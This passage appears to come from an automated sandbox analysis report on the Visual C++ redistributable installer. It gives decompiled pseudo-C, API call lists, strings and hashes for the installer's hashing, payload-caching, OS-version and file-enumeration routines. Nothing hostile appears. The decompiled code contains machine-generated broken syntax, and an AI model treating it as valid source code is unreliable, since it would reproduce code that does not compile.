                                                                          0x0004fa3d
                                                                          0x0004fa45
                                                                          0x0004fb21
                                                                          0x0004fb33
                                                                          0x0004fb3b
                                                                          0x0004fb68
                                                                          0x0004fb6e
                                                                          0x0004fb7e
                                                                          0x0004fb84
                                                                          0x0004fb95
                                                                          0x0004fb98
                                                                          0x0004fb9f
                                                                          0x0004fba2
                                                                          0x0004fba3
                                                                          0x00000000
                                                                          0x0004fba3
                                                                          0x0004fb7e
                                                                          0x0004fb3d
                                                                          0x0004fb3d
                                                                          0x0004fb4e
                                                                          0x0004fb51
                                                                          0x0004fb58
                                                                          0x0004fb5b
                                                                          0x0004fb5c
                                                                          0x00000000
                                                                          0x0004fb5c
                                                                          0x0004fa4b
                                                                          0x0004fa51
                                                                          0x0004fa5e
                                                                          0x0004fa66
                                                                          0x0004fafb
                                                                          0x0004fb0c
                                                                          0x0004fb0f
                                                                          0x0004fb16
                                                                          0x0004fb19
                                                                          0x0004fb1a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004fa66
                                                                          0x00000000
                                                                          0x0004fa45
                                                                          0x0004fa8c
                                                                          0x0004fa9d
                                                                          0x0004faa0
                                                                          0x0004faa7
                                                                          0x0004faaa
                                                                          0x0004faab
                                                                          0x0004fa17
                                                                          0x0004fa17
                                                                          0x0004fa28
                                                                          0x0004fa2b
                                                                          0x0004fa32
                                                                          0x0004fa35
                                                                          0x0004fa36
                                                                          0x0004fa36
                                                                          0x00000000
                                                                          0x0004f9d0
                                                                          0x0004f9d0
                                                                          0x0004f9e1
                                                                          0x0004f9e4
                                                                          0x0004f9eb
                                                                          0x0004f9ee
                                                                          0x0004f9ef
                                                                          0x0004fab0
                                                                          0x0004fab0
                                                                          0x0004fab5
                                                                          0x0004fab5
                                                                          0x0004faba
                                                                          0x0004fac1
                                                                          0x0004fac9
                                                                          0x0004fac9
                                                                          0x0004fad6
                                                                          0x0004fae0
                                                                          0x0004fae0
                                                                          0x0004faeb
                                                                          0x0004faec
                                                                          0x0004faef
                                                                          0x0004faf8

                                                                          APIs
                                                                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,00029CFF,00000003,000007D0,00000003,?,000007D0,00000000,000007D0), ref: 0004F9C6
                                                                          • GetLastError.KERNEL32 ref: 0004F9D0
                                                                          • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 0004FA0D
                                                                          • GetLastError.KERNEL32 ref: 0004FA17
                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 0004FAC9
                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0004FAE0
                                                                          • GetLastError.KERNEL32 ref: 0004FAFB
                                                                          • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 0004FB33
                                                                          • GetLastError.KERNEL32 ref: 0004FB3D
                                                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 0004FB76
                                                                          • GetLastError.KERNEL32 ref: 0004FB84
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CryptErrorLast$Hash$Context$AcquireCreateDestroyFileParamPointerRelease
                                                                          • String ID: @Met$cryputil.cpp
                                                                          • API String ID: 1716956426-3149263966
                                                                          • Opcode ID: e4a64afce194d75bcfe77f2486f02bd12b9359383b5e3b8a3bea1082b6aa36ed
                                                                          • Instruction ID: b2b946b4bd93cf915b3e0625576cae15c4ff94d732e23dd465384550442fd0f8
                                                                          • Opcode Fuzzy Hash: e4a64afce194d75bcfe77f2486f02bd12b9359383b5e3b8a3bea1082b6aa36ed
                                                                          • Instruction Fuzzy Hash: CA51B372E00325ABFB319A658C04BFB76E8EB08742F014176FE4DE7190E7749D909AE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00029C99 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 181COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 58%
                                                                          			E00029C99(void* __ecx, void* __edx, void* __edi, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr* _t81;
				intOrPtr _t84;
				intOrPtr _t85;
				intOrPtr _t87;
				void* _t88;

				_t79 = __edx;
				_t75 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t83 = E00028711(__ecx, __edx, _a4, _a12,  &_v16);
				if(_t46 >= 0) {
					_t81 = _a8;
					_t84 = E00012D79(__ecx, _v16,  *((intOrPtr*)(_t81 + 0x18)),  &_v12);
					__eflags = _t84;
					if(_t84 >= 0) {
						_t85 = E00028E92(__edx, _t81, _v12);
						__eflags = _t85;
						if(_t85 < 0) {
							__eflags = _t85 - 0x80070003;
							if(_t85 != 0x80070003) {
								__eflags = _t85 - 0x80070002;
								if(__eflags != 0) {
									E000500CF(_t79, __eflags, _t85, 0xe0000136, 0,  *_t81, _v12, 0);
									E00054038(_t75, __eflags, _v12);
								}
							}
							_t84 = E000287DC(_t75, _a4,  *_t81,  &_v8);
							__eflags = _t84;
							if(_t84 >= 0) {
								_t52 = E00054315(_a16, 0);
								__eflags = _t52;
								if(_t52 == 0) {
									_t53 = E00054315(_v8, 0);
									__eflags = _t53;
									if(_t53 != 0) {
										L17:
										_t54 = E00028BE5(_t75, _a4, _v8);
										__eflags = _t54;
										if(_t54 >= 0) {
											_t87 = E00028E92(_t79, _t81, _v8);
											__eflags = _t87;
											if(__eflags >= 0) {
												_push(_v12);
												__eflags = _a20;
												_t57 =  ==  ? "copying" : "moving";
												_push( ==  ? "copying" : "moving");
												_push(_v8);
												E0001550F(2, 0x20000131,  *_t81);
												_t88 = _t88 + 0x18;
												_t87 = E000541D1(_v8, _v12, 1, 1, 3, 0x7d0);
												__eflags = _t87;
												if(_t87 >= 0) {
													__imp__DecryptFileW(_v12, 0);
													goto L25;
												}
												_push(_v12);
												_push("Failed to move verified file to complete payload path: %ls");
												L23:
												_push(_t87);
												E0005012F();
												goto L25;
											}
											E000500CF(_t79, __eflags, _t87, 0xe0000136, 0,  *_t81, _v8, 0);
											E00054038(_t75, __eflags, _v8);
											goto L25;
										}
										_push( *_t81);
										_push("Failed to reset permissions on unverified cached payload: %ls");
										goto L23;
									}
									_push(_v8);
									_push(_a16);
									_t87 = 0x80070002;
									E0005012F(0x80070002, "Failed to find payload: %ls in working path: %ls and unverified path: %ls",  *_t81);
									goto L25;
								}
								_t87 = E00028E33(_a16, _v8, _a20);
								__eflags = _t87;
								if(_t87 >= 0) {
									goto L17;
								}
								_push( *_t81);
								_push("Failed to transfer working path to unverified path for payload: %ls.");
								goto L23;
							} else {
								_push("Failed to create unverified path.");
								L11:
								_push(_t84);
								E0005012F();
								L25:
								L26:
								if(_v8 != 0) {
									E000554EF(_v8);
								}
								if(_v12 != 0) {
									E000554EF(_v12);
								}
								if(_v16 != 0) {
									E000554EF(_v16);
								}
								return _t87;
							}
						}
						__imp__DecryptFileW(_v12, 0);
						_push(_v12);
						E0001550F(2, 0x20000130,  *_t81);
						goto L25;
					}
					_push("Failed to concat complete cached path.");
					goto L11;
				}
				E0005012F(_t83, "Failed to get cached path for package with cache id: %ls", _a12);
				goto L26;
			}














                                                                          0x00029c99
                                                                          0x00029c99
                                                                          0x00029ca2
                                                                          0x00029ca5
                                                                          0x00029ca8
                                                                          0x00029cba
                                                                          0x00029cbe
                                                                          0x00029cd7
                                                                          0x00029ce9
                                                                          0x00029ceb
                                                                          0x00029ced
                                                                          0x00029cff
                                                                          0x00029d01
                                                                          0x00029d03
                                                                          0x00029d29
                                                                          0x00029d2f
                                                                          0x00029d31
                                                                          0x00029d37
                                                                          0x00029d48
                                                                          0x00029d50
                                                                          0x00029d50
                                                                          0x00029d37
                                                                          0x00029d63
                                                                          0x00029d65
                                                                          0x00029d67
                                                                          0x00029d80
                                                                          0x00029d85
                                                                          0x00029d87
                                                                          0x00029dae
                                                                          0x00029db3
                                                                          0x00029db5
                                                                          0x00029dd9
                                                                          0x00029ddf
                                                                          0x00029de6
                                                                          0x00029de8
                                                                          0x00029dfc
                                                                          0x00029dfe
                                                                          0x00029e00
                                                                          0x00029e20
                                                                          0x00029e23
                                                                          0x00029e31
                                                                          0x00029e34
                                                                          0x00029e35
                                                                          0x00029e41
                                                                          0x00029e46
                                                                          0x00029e5f
                                                                          0x00029e61
                                                                          0x00029e63
                                                                          0x00029e7d
                                                                          0x00000000
                                                                          0x00029e7d
                                                                          0x00029e65
                                                                          0x00029e68
                                                                          0x00029e6d
                                                                          0x00029e6d
                                                                          0x00029e6e
                                                                          0x00000000
                                                                          0x00029e73
                                                                          0x00029e11
                                                                          0x00029e19
                                                                          0x00000000
                                                                          0x00029e19
                                                                          0x00029dea
                                                                          0x00029dec
                                                                          0x00000000
                                                                          0x00029dec
                                                                          0x00029db7
                                                                          0x00029dbf
                                                                          0x00029dc2
                                                                          0x00029dcc
                                                                          0x00000000
                                                                          0x00029dd1
                                                                          0x00029d97
                                                                          0x00029d99
                                                                          0x00029d9b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00029d9d
                                                                          0x00029d9f
                                                                          0x00000000
                                                                          0x00029d69
                                                                          0x00029d69
                                                                          0x00029d6e
                                                                          0x00029d6e
                                                                          0x00029d6f
                                                                          0x00029e83
                                                                          0x00029e84
                                                                          0x00029e88
                                                                          0x00029e8d
                                                                          0x00029e8d
                                                                          0x00029e96
                                                                          0x00029e9b
                                                                          0x00029e9b
                                                                          0x00029ea4
                                                                          0x00029ea9
                                                                          0x00029ea9
                                                                          0x00029eb4
                                                                          0x00029eb4
                                                                          0x00029d67
                                                                          0x00029d0a
                                                                          0x00029d10
                                                                          0x00029d1c
                                                                          0x00000000
                                                                          0x00029d21
                                                                          0x00029cef
                                                                          0x00000000
                                                                          0x00029cef
                                                                          0x00029cc9
                                                                          0x00000000

                                                                          Strings
                                                                          • Failed to create unverified path., xrefs: 00029D69
                                                                          • Failed to move verified file to complete payload path: %ls, xrefs: 00029E68
                                                                          • Failed to transfer working path to unverified path for payload: %ls., xrefs: 00029D9F
                                                                          • Failed to concat complete cached path., xrefs: 00029CEF
                                                                          • Failed to get cached path for package with cache id: %ls, xrefs: 00029CC3
                                                                          • Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 00029DC6
                                                                          • copying, xrefs: 00029E27
                                                                          • Failed to reset permissions on unverified cached payload: %ls, xrefs: 00029DEC
                                                                          • moving, xrefs: 00029E2C, 00029E34
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to concat complete cached path.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$copying$moving
                                                                          • API String ID: 0-1289240508
                                                                          • Opcode ID: 659d7bf1b1d1b711482d4fa8e788047cd29159fdfa0416352e78110a3f4f7d16
                                                                          • Instruction ID: 5ae98aa7263b4f661b3924a8eef9dc36f725861f502e011974780157ff7a2ca1
                                                                          • Opcode Fuzzy Hash: 659d7bf1b1d1b711482d4fa8e788047cd29159fdfa0416352e78110a3f4f7d16
                                                                          • Instruction Fuzzy Hash: 33514135D40529BBDF226BD0DC02FEEBB76AF04701F214155FE00751A2E7729EA4AB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00016184 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 147COMMONCrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 19%
                                                                          			E00016184(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				struct _OSVERSIONINFOEXW _v292;
				intOrPtr _v300;
				intOrPtr _v312;
				signed int _v316;
				intOrPtr _v320;
				signed int _v324;
				void* __ebx;
				signed int __edi;
				intOrPtr* __esi;
				void* __ebp;
				signed int _t33;
				signed int _t42;
				signed short _t49;
				intOrPtr _t52;
				signed int _t53;
				intOrPtr _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t64;
				signed int _t68;

				_t59 = __edx;
				_t33 =  *0x7a008; // 0xfbf51acb
				_v8 = _t33 ^ _t68;
				_t52 = _a8;
				E0003F670(_t60,  &_v292, 0, 0x11c);
				_v292.dwOSVersionInfoSize = 0x11c;
				_t61 =  &_v316;
				_t53 = 6;
				memset(_t61, 0, _t53 << 2);
				_t62 = _t61 + _t53;
				if(GetVersionExW( &_v292) != 0) {
					_t42 = _a4 + 0xfffffffc;
					if(_t42 <= 9) {
						switch( *((intOrPtr*)(_t42 * 4 +  &M00016338))) {
							case 0:
								_t48 = _v292.wProductType & 0x000000ff;
								asm("cdq");
								_v312 = _t59;
								_v300 = 1;
								goto L21;
							case 1:
								__eax = _v292.wSuiteMask;
								__eax = _v292.wSuiteMask >> 2;
								goto L6;
							case 2:
								__eax = _v292.wSuiteMask;
								__eax = _v292.wSuiteMask >> 7;
								goto L6;
							case 3:
								__eax = _v292.wSuiteMask;
								__eax = _v292.wSuiteMask >> 1;
								goto L6;
							case 4:
								__eax = _v292.wSuiteMask;
								__eax = _v292.wSuiteMask >> 9;
								goto L6;
							case 5:
								__eax = _v292.wSuiteMask;
								goto L6;
							case 6:
								__eax = _v292.wSuiteMask;
								__eax = _v292.wSuiteMask >> 5;
								goto L6;
							case 7:
								__eax = _v292.wSuiteMask;
								__eax = _v292.wSuiteMask >> 0xa;
								L6:
								__edi = 0;
								__edi = 1;
								__eax = __eax & 1;
								goto L7;
							case 8:
								__edi = 0;
								__edi = 1;
								_push(1);
								_push(2);
								_push(0);
								_push(0);
								__esi = __imp__VerSetConditionMask;
								__eax =  *__esi();
								_push(1);
								_push(1);
								_push(__edx);
								_push(__eax);
								__eax =  *__esi();
								_push(1);
								_push(0x20);
								_push(__edx);
								_push(__eax);
								__eax =  *__esi();
								_push(1);
								_push(0x10);
								_push(__edx);
								_push(__eax);
								__eax =  *__esi();
								_push(__edx);
								 &_v292 = VerifyVersionInfoW( &_v292, 0x33,  &_v292);
								L7:
								asm("cdq");
								_v312 = __edx;
								goto L20;
							case 9:
								__eax = _v292.wSuiteMask;
								__edi = 0;
								__edi = 1;
								if((__al & 0x00000010) == 0) {
									L18:
									asm("xorps xmm0, xmm0");
									asm("movlpd [ebp-0x140], xmm0");
									__esi = _v320;
									__eax = _v324;
								} else {
									__eax = __eax & 0x00000100;
									__ecx = 0;
									if(__cx != __ax) {
										goto L18;
									} else {
										__eax = 1;
									}
								}
								_v312 = __esi;
								L20:
								_v300 = __edi;
								L21:
								_v316 = _t48;
								goto L22;
						}
					}
					L22:
					_t64 = E0002FF73(_t59,  &_v316, _t52);
					if(_t64 < 0) {
						_push("Failed to set variant value.");
						goto L24;
					}
				} else {
					_t49 = GetLastError();
					_t67 =  <=  ? _t49 : _t49 & 0x0000ffff | 0x80070000;
					_t64 =  >=  ? 0x80004005 :  <=  ? _t49 : _t49 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "variable.cpp", 0x6a1, _t64);
					_push("Failed to get OS info.");
					L24:
					_push(_t64);
					E0005012F();
				}
				return E0003DE36(_t52, _v8 ^ _t68, _t59, _t62, _t64);
			}

























                                                                          0x00016184
                                                                          0x0001618d
                                                                          0x00016194
                                                                          0x00016198
                                                                          0x000161ac
                                                                          0x000161b4
                                                                          0x000161c0
                                                                          0x000161c8
                                                                          0x000161c9
                                                                          0x000161c9
                                                                          0x000161da
                                                                          0x00016217
                                                                          0x0001621d
                                                                          0x00016223
                                                                          0x00000000
                                                                          0x0001622a
                                                                          0x0001622e
                                                                          0x0001622f
                                                                          0x00016235
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00016244
                                                                          0x00016247
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001625b
                                                                          0x0001625e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00016263
                                                                          0x00016266
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001626a
                                                                          0x0001626d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00016272
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00016277
                                                                          0x0001627a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001627f
                                                                          0x00016282
                                                                          0x0001624a
                                                                          0x0001624a
                                                                          0x0001624c
                                                                          0x0001624d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00016287
                                                                          0x00016289
                                                                          0x0001628a
                                                                          0x0001628b
                                                                          0x0001628d
                                                                          0x0001628e
                                                                          0x0001628f
                                                                          0x00016295
                                                                          0x00016297
                                                                          0x00016298
                                                                          0x00016299
                                                                          0x0001629a
                                                                          0x0001629b
                                                                          0x0001629d
                                                                          0x0001629e
                                                                          0x000162a0
                                                                          0x000162a1
                                                                          0x000162a2
                                                                          0x000162a4
                                                                          0x000162a5
                                                                          0x000162a7
                                                                          0x000162a8
                                                                          0x000162a9
                                                                          0x000162ab
                                                                          0x000162b6
                                                                          0x0001624f
                                                                          0x0001624f
                                                                          0x00016250
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000162be
                                                                          0x000162c1
                                                                          0x000162c3
                                                                          0x000162c6
                                                                          0x000162d8
                                                                          0x000162d8
                                                                          0x000162db
                                                                          0x000162e3
                                                                          0x000162e9
                                                                          0x000162c8
                                                                          0x000162c8
                                                                          0x000162cd
                                                                          0x000162d2
                                                                          0x00000000
                                                                          0x000162d4
                                                                          0x000162d4
                                                                          0x000162d4
                                                                          0x000162d2
                                                                          0x000162ef
                                                                          0x000162f5
                                                                          0x000162f5
                                                                          0x000162fb
                                                                          0x000162fb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00016223
                                                                          0x00016301
                                                                          0x0001630e
                                                                          0x00016312
                                                                          0x00016314
                                                                          0x00000000
                                                                          0x00016314
                                                                          0x000161dc
                                                                          0x000161dc
                                                                          0x000161ed
                                                                          0x000161f7
                                                                          0x00016205
                                                                          0x0001620a
                                                                          0x00016319
                                                                          0x00016319
                                                                          0x0001631a
                                                                          0x00016320
                                                                          0x00016333

                                                                          APIs
                                                                          • GetVersionExW.KERNEL32(0000011C), ref: 000161D2
                                                                          • GetLastError.KERNEL32 ref: 000161DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastVersion
                                                                          • String ID: @Met$Failed to get OS info.$Failed to set variant value.$variable.cpp
                                                                          • API String ID: 305913169-3137693696
                                                                          • Opcode ID: 3a4baa96aa351c8be36cea74f55e1c0ec2f49885ff1b0067c10e9b20bcec5e3a
                                                                          • Instruction ID: f0dedcc37b931de7b9d5ac23cce31b5bb6f08f9eba3c9fab2591ac34d3f16e76
                                                                          • Opcode Fuzzy Hash: 3a4baa96aa351c8be36cea74f55e1c0ec2f49885ff1b0067c10e9b20bcec5e3a
                                                                          • Instruction Fuzzy Hash: FE418871E05628ABDB30DBA9CC45FEF7BB8EB89710F10019AF909E7141D6759E81CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002993E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108filestringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 95%
                                                                          			E0002993E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				short _v38;
				struct _WIN32_FIND_DATAW _v600;
				char _v604;
				char _v608;
				WCHAR* _v612;
				void* __ebp;
				signed int _t39;
				signed int _t60;
				void* _t63;
				signed int _t65;
				void* _t68;
				void* _t69;
				void* _t72;
				void* _t74;
				void* _t75;
				signed int _t76;

				_t74 = __esi;
				_t73 = __edi;
				_t72 = __edx;
				_t69 = __ecx;
				_t68 = __ebx;
				_t39 =  *0x7a008; // 0xfbf51acb
				_v8 = _t39 ^ _t76;
				_v604 = 0;
				_v612 = 0;
				_v608 = 0;
				E0003F670(__edi,  &_v600, 0, 0x250);
				if(E0002A189(_t69, _a4, L".unverified",  &_v604) >= 0) {
					E00013BC3(_t72, _v604, 7);
				}
				if(_a4 != 0 || E000280AE(_t72, _a8,  &_v604) < 0 || E00012D79(_t69, _v604, L"*.*",  &_v612) < 0) {
					L16:
					if(_v608 != 0) {
						E000554EF(_v608);
					}
					if(_v612 != 0) {
						E000554EF(_v612);
					}
					if(_v604 != 0) {
						E000554EF(_v604);
					}
					return E0003DE36(_t68, _v8 ^ _t76, _t72, _t73, _t74);
				} else {
					_push(_t74);
					_t75 = FindFirstFileW(_v612,  &_v600);
					if(_t75 == 0xffffffff) {
						L15:
						_pop(_t74);
						goto L16;
					} else {
						goto L6;
					}
					do {
						L6:
						if((_v600.dwFileAttributes & 0x00000010) != 0) {
							goto L13;
						}
						_v38 = 0;
						_t60 = lstrlenW( &(_v600.cFileName));
						if(_t60 <= 2) {
							L11:
							_t63 = E00012D79(_t69, _v604,  &(_v600.cFileName),  &_v608);
							_t89 = _t63;
							if(_t63 >= 0) {
								E00054038(_t69, _t89, _v608);
							}
							goto L13;
						}
						_t69 = 0x2e;
						if(_t69 !=  *((intOrPtr*)(_t76 + _t60 * 2 - 0x22c))) {
							goto L11;
						}
						_t65 =  *(_t76 + _t60 * 2 - 0x22a) & 0x0000ffff;
						_t69 = 0x52;
						if(_t69 == _t65) {
							goto L13;
						}
						_t69 = 0x72;
						if(_t69 == _t65) {
							goto L13;
						}
						goto L11;
						L13:
					} while (FindNextFileW(_t75,  &_v600) != 0);
					FindClose(_t75);
					goto L15;
				}
			}




















                                                                          0x0002993e
                                                                          0x0002993e
                                                                          0x0002993e
                                                                          0x0002993e
                                                                          0x0002993e
                                                                          0x00029947
                                                                          0x0002994e
                                                                          0x00029959
                                                                          0x0002995f
                                                                          0x00029965
                                                                          0x00029972
                                                                          0x00029990
                                                                          0x0002999a
                                                                          0x0002999a
                                                                          0x000299a3
                                                                          0x00029a86
                                                                          0x00029a8d
                                                                          0x00029a95
                                                                          0x00029a95
                                                                          0x00029aa1
                                                                          0x00029aa9
                                                                          0x00029aa9
                                                                          0x00029ab5
                                                                          0x00029abd
                                                                          0x00029abd
                                                                          0x00029acf
                                                                          0x000299df
                                                                          0x000299df
                                                                          0x000299f3
                                                                          0x000299f8
                                                                          0x00029a85
                                                                          0x00029a85
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000299fe
                                                                          0x000299fe
                                                                          0x00029a05
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00029a09
                                                                          0x00029a14
                                                                          0x00029a1d
                                                                          0x00029a44
                                                                          0x00029a58
                                                                          0x00029a5d
                                                                          0x00029a5f
                                                                          0x00029a67
                                                                          0x00029a67
                                                                          0x00000000
                                                                          0x00029a5f
                                                                          0x00029a21
                                                                          0x00029a2a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00029a2c
                                                                          0x00029a36
                                                                          0x00029a3a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00029a3e
                                                                          0x00029a42
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00029a6c
                                                                          0x00029a7a
                                                                          0x00029a7f
                                                                          0x00000000
                                                                          0x00029a7f

                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,*.*,?,?,?,00000000,.unverified,?), ref: 000299ED
                                                                          • lstrlenW.KERNEL32(?), ref: 00029A14
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00029A74
                                                                          • FindClose.KERNEL32(00000000), ref: 00029A7F
                                                                            • Part of subcall function 00013BC3: GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00013C3F
                                                                            • Part of subcall function 00013BC3: GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013C52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
                                                                          • String ID: *.*$.unverified
                                                                          • API String ID: 457978746-2528915496
                                                                          • Opcode ID: 872cef537130b2314592f93bb935aba36d3da743d93278e59e780cef7edbbb65
                                                                          • Instruction ID: 422a58305c53c566ea1202305ec6c2d876cd30551f35041c1ae1eb8fa30b5837
                                                                          • Opcode Fuzzy Hash: 872cef537130b2314592f93bb935aba36d3da743d93278e59e780cef7edbbb65
                                                                          • Instruction Fuzzy Hash: E5418E3190063CAEDF60AB64EC49BEAB7B8AF44306F4001A5E908E50A1EB759EC4CF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00058733 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 79timeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 45%
                                                                          			E00058733(void* __ebx, signed int __edx, intOrPtr _a4, struct _SYSTEMTIME* _a8, intOrPtr _a12) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				struct _TIME_ZONE_INFORMATION _v196;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t26;
				signed int _t35;
				void* _t37;
				void* _t54;
				signed int _t55;
				void* _t56;
				intOrPtr _t61;
				struct _SYSTEMTIME* _t62;
				signed int _t63;

				_t59 = __edx;
				_t54 = __ebx;
				_t26 =  *0x7a008; // 0xfbf51acb
				_v8 = _t26 ^ _t63;
				_t62 = _a8;
				_t61 = _a4;
				if(_a12 == 0) {
					GetTimeZoneInformation( &_v196);
					SystemTimeToTzSpecificLocalTime( &_v196, _t62,  &_v24);
					asm("cdq");
					_t55 = 0x3c;
					_t35 = (_v196.Bias ^ _t59) - _t59;
					_t59 = _t35 % _t55;
					_push(_t35 % _t55);
					_push(_t35 / _t55);
					_t37 = 0x2d;
					_t56 = 0x2b;
					_t38 =  <=  ? _t56 : _t37;
					_push( <=  ? _t56 : _t37);
					_push(_v24.wSecond & 0x0000ffff);
					_push(_v24.wMinute & 0x0000ffff);
					_push(_v24.wHour & 0x0000ffff);
					_push(_v24.wDay & 0x0000ffff);
					_push(_v24.wMonth & 0x0000ffff);
					E00011F20(_t61, L"%04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u", _v24.wYear & 0x0000ffff);
				} else {
					_push(_t62->wSecond & 0x0000ffff);
					_push(_t62->wMinute & 0x0000ffff);
					_push(_t62->wHour & 0x0000ffff);
					_push(_t62->wDay & 0x0000ffff);
					_push(_t62->wMonth & 0x0000ffff);
					E00011F20(_t61, L"%04hu-%02hu-%02huT%02hu:%02hu:%02huZ", _t62->wYear & 0x0000ffff);
				}
				return E0003DE36(_t54, _v8 ^ _t63, _t59, _t61, _t62);
			}


















                                                                          0x00058733
                                                                          0x00058733
                                                                          0x0005873c
                                                                          0x00058743
                                                                          0x0005874b
                                                                          0x0005874f
                                                                          0x00058752
                                                                          0x00058788
                                                                          0x0005879a
